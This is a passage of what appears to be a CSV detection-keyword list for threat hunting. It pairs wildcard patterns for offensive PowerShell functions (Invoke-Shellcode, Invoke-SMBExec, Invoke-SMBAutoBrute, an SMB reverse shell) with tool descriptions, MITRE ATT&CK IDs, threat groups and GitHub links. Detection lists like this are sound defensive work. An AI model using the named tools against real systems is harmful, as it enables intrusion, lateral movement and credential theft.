wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharpshares*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSniper*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSploit*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharpsploit_nomimi*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSpray*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSSDP*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - 
T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpStay*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpUp*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpUp*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Sharpview*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpWatson*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharpweb*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation 
tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharpweb*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpWeb.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SharpWSUS*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Shellcode -Shellcode*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-Shellcode*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-Shellcode*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*Invoke-Shellcode*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Invoke-Shellcode.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Shellcode.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-ShellcodeMSIL*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ShellCommand*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SlinkyCat*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*Invoke-SMBAutoBrute*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-SMBAutoBrute*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SMBAutoBrute.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SMBAutoBrute*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-smbclient *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - 
T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-SMBClient*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SMBEnum*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invoke-smbexec *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-SMBExec*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - 
T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SMBExec*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SMBExec.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SMBExec.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-smblogin *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-SMBNegotiate -ComputerName localhost*,offensive_tool_keyword,WinPwn,Automation for 
internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SMBNegotiate*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SmbObey *,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,0,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-SmbObey.*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-SmbOrder *,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,0,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-SmbOrder.*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-SMBRemoting.ps1*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - 
T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,1,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*Invoke-SMBRemoting-main*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,1,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*Invoke-SMBScanner*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SmbScanner.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SmbScanner*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SmbScanner.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z 